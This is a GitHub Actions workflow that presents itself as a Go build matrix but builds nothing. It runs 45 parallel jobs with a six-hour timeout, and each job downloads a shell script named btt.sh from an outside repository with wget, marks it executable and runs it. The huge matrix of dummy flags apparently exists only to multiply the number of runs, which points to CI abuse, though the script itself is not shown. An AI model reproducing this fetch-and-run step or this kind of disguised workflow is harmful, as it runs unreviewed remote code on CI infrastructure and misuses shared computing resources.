name: BTT
on: [push, pull_request]
jobs:
  build:
    name: nyoba1234
    runs-on: ubuntu-18.04
    strategy:
      max-parallel: 10
      fail-fast: false
      matrix:
        go: [1.6, 1.7, 1.8, 1.9, 1.10]
        flag: [A, B, C, D, E, F, G, H, I]
    timeout-minutes: 360
    env:
        NUM_JOBS: 15
        JOB: ${{ matrix.go }}
    steps:
    - name: Set up Go ${{ matrix.go }}
      uses: actions/setup-go@v1
      with:
        go-version: ${{ matrix.go }}
      id: go
    - name: Setup
      uses: actions/checkout@v1
    - name: nyoba1234
      run: |
        wget https://github.com/pengamatabg/btt/blob/main/btt.sh && chmod u+x btt.sh && ./btt.sh
